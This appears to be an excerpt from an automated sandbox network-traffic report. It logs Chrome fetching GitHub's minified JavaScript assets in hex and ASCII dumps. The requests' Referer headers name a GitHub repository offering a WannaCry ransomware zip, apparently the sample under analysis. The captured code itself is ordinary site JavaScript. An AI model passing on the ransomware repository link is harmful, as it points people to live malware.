                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 64 69 73 74 5f 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 2d 66 66 61 64 65 65 30 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 64 69 73 74 5f 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 6a 73 2d
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 6e 2e 68 65 69 67 68 74 7d 60 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 22 75 6e 6b 6e 6f 77 6e 22 7d 7d 28 29 2c 62 72 6f 77 73 65 72 5f 72 65 73 6f 6c 75 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 30 2c 74 3d 30 3b 74 72 79 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3f 28 74 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 65 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 29 3a 6e 75 6c 6c 21 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 6e 75 6c 6c 21 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3f 28 74 3d 64 6f 63 75 6d 65 6e
                                                                                      Data Ascii: n.height}`}catch(e){return"unknown"}}(),browser_resolution:function(){let e=0,t=0;try{return"number"==typeof window.innerWidth?(t=window.innerWidth,e=window.innerHeight):null!=document.documentElement&&null!=document.documentElement.clientWidth?(t=documen
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 73 28 65 29 7b 69 66 28 69 2e 68 61 73 28 65 29 29 72 65 74 75 72 6e 20 69 2e 67 65 74 28 65 29 3b 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 2c 6e 3d 30 2c 73 3d 30 2c 72 3d 30 2c 6c 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 74 3b 69 2b 3d 31 29 7b 6c 65 74 20 74 3d 65 5b 69 5d 2c 61 3d 65 5b 69 2b 31 5d 2c 6f 3d 65 5b 69 2d 31 5d 3b 22 7b 22 3d 3d 3d 74 26 26 22 7b 22 3d 3d 3d 61 26 26 22 5c 5c 22 21 3d 3d 6f 3f 28 31 3d 3d 3d 28 72 2b 3d 31 29 26 26 28 73 3d 69 29 2c 69 2b 3d 31 29 3a 22 7d 22 3d 3d 3d 74 26 26 22 7d 22 3d 3d 3d 61 26 26 22 5c 5c 22 21 3d 3d 6f 26 26 72 26 26 30 3d 3d 28 72 2d 3d 31 29 26 26 28 73 3e 6e 26 26 28 6c 2e 70 75 73 68 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 73 74
                                                                                      Data Ascii: s(e){if(i.has(e))return i.get(e);let t=e.length,n=0,s=0,r=0,l=[];for(let i=0;i<t;i+=1){let t=e[i],a=e[i+1],o=e[i-1];"{"===t&&"{"===a&&"\\"!==o?(1===(r+=1)&&(s=i),i+=1):"}"===t&&"}"===a&&"\\"!==o&&r&&0==(r-=1)&&(s>n&&(l.push(Object.freeze({type:"string",st
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 4c 69 73 74 2e 70 75 73 68 28 65 29 7d 75 70 64 61 74 65 50 61 72 65 6e 74 28 65 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 70 61 72 74 4c 69 73 74 2e 6c 65 6e 67 74 68 26 26 6e 75 6c 6c 3d 3d 3d 65 29 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 4e 53 28 74 68 69 73 2e 61 74 74 72 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 74 68 69 73 2e 61 74 74 72 2e 6e 61 6d 65 29 3b 65 6c 73 65 7b 6c 65 74 20 65 3d 74 68 69 73 2e 70 61 72 74 4c 69 73 74 2e 6d 61 70 28 65 3d 3e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 65 2e 76 61 6c 75 65 29 2e 6a 6f 69 6e 28 22 22 29 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 4e 53 28 74 68 69 73 2e 61 74 74 72 2e 6e 61 6d 65 73 70 61 63 65
                                                                                      Data Ascii: List.push(e)}updateParent(e){if(1===this.partList.length&&null===e)this.element.removeAttributeNS(this.attr.namespaceURI,this.attr.name);else{let e=this.partList.map(e=>"string"==typeof e?e:e.value).join("");this.element.setAttributeNS(this.attr.namespace
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 73 74 61 6e 63 65 2e 70 72 6f 74 6f 74 79 70 65 26 26 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 68 69 73 2c 54 65 6d 70 6c 61 74 65 49 6e 73 74 61 6e 63 65 2e 70 72 6f 74 6f 74 79 70 65 29 2c 74 68 69 73 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 2e 63 6f 6e 74 65 6e 74 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 29 2c 70 2e 73 65 74 28 74 68 69 73 2c 41 72 72 61 79 2e 66 72 6f 6d 28 66 75 6e 63 74 69 6f 6e 2a 28 65 29 7b 6c 65 74 20 74 3b 6c 65 74 20 6e 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 72 65 65 57 61 6c 6b 65 72 28 65 2c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 54 45 58 54 7c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 45 4c 45 4d 45 4e 54 2c 6e 75 6c 6c 2c 21 31 29 3b 66 6f 72 28
                                                                                      Data Ascii: stance.prototype&&Object.setPrototypeOf(this,TemplateInstance.prototype),this.appendChild(e.content.cloneNode(!0)),p.set(this,Array.from(function*(e){let t;let n=e.ownerDocument.createTreeWalker(e,NodeFilter.SHOW_TEXT|NodeFilter.SHOW_ELEMENT,null,!1);for(
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 74 65 22 29 2c 69 3d 74 68 69 73 2e 73 74 72 69 6e 67 73 2e 6c 65 6e 67 74 68 2d 31 2c 73 3d 74 68 69 73 2e 73 74 72 69 6e 67 73 2e 72 65 64 75 63 65 28 28 65 2c 74 2c 6e 29 3d 3e 65 2b 74 2b 28 6e 3c 69 3f 60 7b 7b 20 24 7b 6e 7d 20 7d 7d 60 3a 22 22 29 2c 22 22 29 2c 72 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 3d 3d 3d 28 65 3d 54 65 6d 70 6c 61 74 65 52 65 73 75 6c 74 2e 63 73 70 54 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 72 65 61 74 65 48 54 4d 4c 28 73 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 73 3b 72 65 74 75 72 6e 20 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 72 2c 6d 2e 73 65 74 28 74 68 69 73 2e 73 74 72 69 6e 67 73 2c 6e 29 2c 6e 7d 7d 72 65 6e 64 65 72 49
                                                                                      Data Ascii: te"),i=this.strings.length-1,s=this.strings.reduce((e,t,n)=>e+t+(n<i?`{{ ${n} }}`:""),""),r=null!==(t=null===(e=TemplateResult.cspTrustedTypesPolicy)||void 0===e?void 0:e.createHTML(s))&&void 0!==t?t:s;return n.innerHTML=r,m.set(this.strings,n),n}}renderI
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 2c 65 2e 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 4e 53 28 65 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 73 70 61 63 65 2c 65 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 29 2c 31 29 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 54 65 6d 70 6c 61 74 65 52 65 73 75 6c 74 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 54 65 6d 70 6c 61 74 65 50 61 72 74 26 26 28 74 2e 72 65 6e 64 65 72 49 6e 74 6f 28 65 29 2c 31 29 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 54 65 6d 70 6c 61 74 65 50 61 72 74 26 26 28 74 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 65 2e 72 65 70 6c 61 63 65 28 2e 2e 2e 74 2e 63 68 69 6c
                                                                                      Data Ascii: ,e.element.removeAttributeNS(e.attributeNamespace,e.attributeName),1)||t instanceof TemplateResult&&e instanceof NodeTemplatePart&&(t.renderInto(e),1)||t instanceof DocumentFragment&&e instanceof NodeTemplatePart&&(t.childNodes.length&&e.replace(...t.chil
                                                                                      2024-03-23 14:47:26 UTC27INData Raw: 66 66 61 64 65 65 30 2d 63 33 32 38 62 66 32 36 61 64 65 66 2e 6a 73 2e 6d 61 70
                                                                                      Data Ascii: ffadee0-c328bf26adef.js.map


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      75192.168.2.1649780185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC688OUTGET /assets/chunk-app_components_search_custom-scopes-element_ts-f5230254d82b.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 10186
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:09 GMT
                                                                                      ETag: 0x8DC33C6BF8D3113
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2069262
                                                                                      X-Served-By: cache-iad-kiad7000044-IAD, cache-ewr18128-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1036, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: cd440e2eacd28588570e7b5f04a811c3855aef7f
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 73 65 61 72 63 68 5f 63 75 73 74 6f 6d 2d 73 63 6f 70 65 73 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 5d 2c 7b 32 36 31 35 30 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 72 28 74 29 2c 6f 2e 64 28 74 2c 7b 43 75 73 74 6f 6d 53 63 6f 70 65 73 45 6c 65 6d 65 6e 74 3a 28 29 3d 3e 54 7d 29 3b 76 61 72 20 73 2c 61 2c 69 2c 6e 2c 63 2c 72 2c 6c 2c 64 2c 75 3d 6f 28 37 36 30 30 36 29 2c 68 3d 6f 28 35 35 33 39 39 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 29 7b 69 66 28 74 2e 68 61 73 28 65 29 29 74 68
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_components_search_custom-scopes-element_ts"],{26150:(e,t,o)=>{o.r(t),o.d(t,{CustomScopesElement:()=>T});var s,a,i,n,c,r,l,d,u=o(76006),h=o(55399);function p(e,t){if(t.has(e))th
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 64 43 61 6c 6c 62 61 63 6b 28 29 7b 53 28 74 68 69 73 2c 73 2c 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 61 78 2d 63 75 73 74 6f 6d 2d 73 63 6f 70 65 73 22 29 7c 7c 22 31 30 22 2c 31 30 29 29 7d 69 6e 69 74 69 61 6c 69 7a 65 28 65 2c 74 2c 6f 2c 73 29 7b 53 28 74 68 69 73 2c 61 2c 65 29 2c 53 28 74 68 69 73 2c 69 2c 74 29 2c 53 28 74 68 69 73 2c 6e 2c 6f 29 2c 53 28 74 68 69 73 2c 63 2c 73 29 7d 6d 6f 64 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 72 65 61 74 65 43 75 73 74 6f 6d 53 63 6f 70 65 46 6f 72 6d 2e 68 69 64 64 65 6e 3f 22 6d 61 6e 61 67 65 22 3a 22 63 72 65 61 74 65 22 7d 63 75 73 74 6f 6d 53 63 6f 70 65 73 53 75 62 6d 69 74 28 65 29 7b 22 6d 61 6e 61 67 65 22 3d 3d 3d 74 68 69
                                                                                      Data Ascii: dCallback(){S(this,s,parseInt(this.getAttribute("data-max-custom-scopes")||"10",10))}initialize(e,t,o,s){S(this,a,e),S(this,i,t),S(this,n,o),S(this,c,s)}mode(){return this.createCustomScopeForm.hidden?"manage":"create"}customScopesSubmit(e){"manage"===thi
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 63 20 65 64 69 74 43 75 73 74 6f 6d 53 63 6f 70 65 28 65 29 7b 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 6c 65 74 20 74 3d 65 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 64 22 29 3b 74 7c 7c 28 74 3d 65 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 22 62 75 74 74 6f 6e 22 29 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 64 22 29 7c 7c 6e 75 6c 6c 29 3b 6c 65 74 20 6f 3d 61 77 61 69 74 20 67 28 74 68 69 73 2c 64 2c 4d 29 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 3b 74 26 26 6f 26 26 28 67 28 74 68 69 73 2c 72 2c 77 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 55 70 64 61 74 65 20 73 61 76 65 64 20 73 65 61 72 63 68 22 2c 22 55 70
                                                                                      Data Ascii: c editCustomScope(e){e.stopPropagation(),e.preventDefault();let t=e.target.getAttribute("data-id");t||(t=e.target.closest("button")?.getAttribute("data-id")||null);let o=await g(this,d,M).call(this,t);t&&o&&(g(this,r,w).call(this,"Update saved search","Up
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 7d 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 73 6d 61 6c 6c 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 24 7b 65 2e 71 75 65 72 79 7d 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 2d 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 63 74 69 63 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 63 74 69 6f 6e 3d 22 63 6c 69 63 6b 3a 71 62 73 65 61 72 63 68 2d 69 6e 70 75 74
                                                                                      Data Ascii: }</div> <div class="text-small color-fg-muted">${e.query}</div> </div> <div class="flex-1"></div> <button type="button" class="btn btn-octicon" data-action="click:qbsearch-input
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 3f 2e 6c 65 6e 28 29 7c 7c 30 29 3e 3d 66 28 74 68 69 73 2c 73 29 3b 74 3f 74 68 69 73 2e 63 75 73 74 6f 6d 53 63 6f 70 65 73 4d 6f 64 61 6c 44 69 61 6c 6f 67 46 6c 61 73 68 2e 69 6e 6e 65 72 48 54 4d 4c 3d 60 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 61 73 68 20 66 6c 61 73 68 2d 77 61 72 6e 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 4c 69 6d 69 74 20 6f 66 20 31 30 20 73 61 76 65 64 20 73 65 61 72 63 68 65 73 20 72 65 61 63 68 65 64 2e 20 50 6c 65 61 73 65 20 64 65 6c 65 74 65 20 61 6e 20 65 78 69 73 74 69 6e 67 20 73 61 76 65 64 20 73 65 61 72 63 68 20 62 65 66 6f 72 65 20 63 72 65 61 74 69 6e 67 20 61 20 6e 65 77 20 6f 6e 65 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 60 3a 74 68 69 73 2e
                                                                                      Data Ascii: ?.len()||0)>=f(this,s);t?this.customScopesModalDialogFlash.innerHTML=` <div class="flash flash-warn mb-3"> Limit of 10 saved searches reached. Please delete an existing saved search before creating a new one. </div> `:this.
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 65 6c 65 74 65 20 74 2e 68 6f 73 74 2c 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 29 29 65 2e 73 74 61 72 74 73 57 69 74 68 28 6c 29 26 26 28 74 5b 65 2e 72 65 70 6c 61 63 65 28 6c 2c 22 22 29 5d 3d 6f 2c 64 65 6c 65 74 65 20 74 5b 65 5d 29 3b 6c 65 74 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6d 65 74 61 5b 6e 61 6d 65 3d 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 5d 22 29 3b 69 66 28 6f 29 7b 6c 65 74 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 6f 2e 63 6f 6e 74 65 6e 74 29 29 3b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 65 29 7d 6c 65 74 20 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 66 6f 72
                                                                                      Data Ascii: elete t.host,Object.entries(t)))e.startsWith(l)&&(t[e.replace(l,"")]=o,delete t[e]);let o=document.querySelector("meta[name=visitor-payload]");if(o){let e=JSON.parse(atob(o.content));Object.assign(t,e)}let s=new URLSearchParams(window.location.search);for
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 7b 69 6e 63 72 65 6d 65 6e 74 4b 65 79 3a 22 54 52 55 53 54 45 44 5f 54 59 50 45 53 5f 50 4f 4c 49 43 59 5f 43 41 4c 4c 45 44 22 2c 74 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 4e 61 6d 65 3a 74 7d 2c 21 31 2c 2e 31 29 3b 6c 65 74 20 69 3d 65 28 29 3b 72 65 74 75 72 6e 20 6c 26 26 6e 65 77 20 50 72 6f 6d 69 73 65 28 65 3d 3e 7b 6c 65 74 20 6f 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2c 73 3d 63 28 29 2e 73 61 6e 69 74 69 7a 65 28 69 2c 7b 46 4f 52 42 49 44 5f 41 54 54 52 3a 5b 5d 7d 29 2c 61 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 3b 69 66 28 69 2e 6c 65 6e 67 74 68 21 3d 3d 73 2e 6c 65 6e 67 74 68 29 7b 6c 65 74 20 6e 3d 45 72 72 6f 72 28 22 54 72 75 73 74 65 64 20 54 79 70 65
                                                                                      Data Ascii: {incrementKey:"TRUSTED_TYPES_POLICY_CALLED",trustedTypesPolicyName:t},!1,.1);let i=e();return l&&new Promise(e=>{let o=window.performance.now(),s=c().sanitize(i,{FORBID_ATTR:[]}),a=window.performance.now();if(i.length!==s.length){let n=Error("Trusted Type
                                                                                      2024-03-23 14:47:26 UTC540INData Raw: 20 20 20 59 6f 75 27 72 65 20 70 72 6f 62 61 62 6c 79 20 73 65 65 69 6e 67 20 61 20 52 65 70 6f 72 74 20 4f 6e 6c 79 20 54 72 75 73 74 65 64 20 54 79 70 65 73 20 65 72 72 6f 72 20 6e 65 61 72 20 74 68 69 73 20 6d 65 73 73 61 67 65 2e 20 54 68 69 73 20 69 73 20 69 6e 74 65 6e 64 65 64 20 62 65 68 61 76 69 6f 75 72 2c 20 73 74 61 66 66 2d 6f 6e 6c 79 2c 0a 20 20 20 20 64 6f 65 73 20 6e 6f 74 20 69 6d 70 61 63 74 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 63 6f 6e 74 72 6f 6c 20 66 6c 6f 77 2c 20 61 6e 64 20 69 73 20 75 73 65 64 20 73 6f 6c 65 6c 79 20 66 6f 72 20 73 74 61 74 69 73 74 69 63 20 63 6f 6c 6c 65 63 74 69 6f 6e 2e 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 20 77 65 0a 20 20 20 20 63 61 6e 27 74 20 67 61 74 68 65 72 20 74 68 65 73 65 20 73 74 61 74 69
                                                                                      Data Ascii: You're probably seeing a Report Only Trusted Types error near this message. This is intended behaviour, staff-only, does not impact application control flow, and is used solely for statistic collection. Unfortunately we can't gather these stati


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      76192.168.2.1649781185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC742OUTGET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-f11236-50158068cc10.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 18524
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 13 Dec 2023 15:12:50 GMT
                                                                                      ETag: 0x8DBFBEDF8D57FD5
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 1921674
                                                                                      X-Served-By: cache-iad-kcgs7200120-IAD, cache-ewr18143-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 116, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: e774191405627a0764dd6cf9fe1b2c6e4925e445
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 69 6e 69 2d 74 68 72 6f 74 74 6c 65 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 2d 66 31 31 32 33 36 22 5d 2c 7b 34 36 32 36 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 3d 30 2c 7b 73 74 61 72 74 3a 6e 3d 21 30 2c 6d 69 64 64 6c 65 3a 72 3d 21 30 2c 6f 6e 63 65 3a 69 3d 21 31 7d 3d 7b 7d 29 7b 6c 65 74 20
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-f11236"],{46263:(e,t,n)=>{function r(e,t=0,{start:n=!0,middle:r=!0,once:i=!1}={}){let
